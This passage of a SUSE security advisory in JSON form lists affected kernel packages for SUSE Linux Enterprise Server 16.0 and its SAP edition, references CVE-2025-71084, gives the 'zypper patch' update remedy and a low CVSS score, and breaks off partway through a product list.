"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
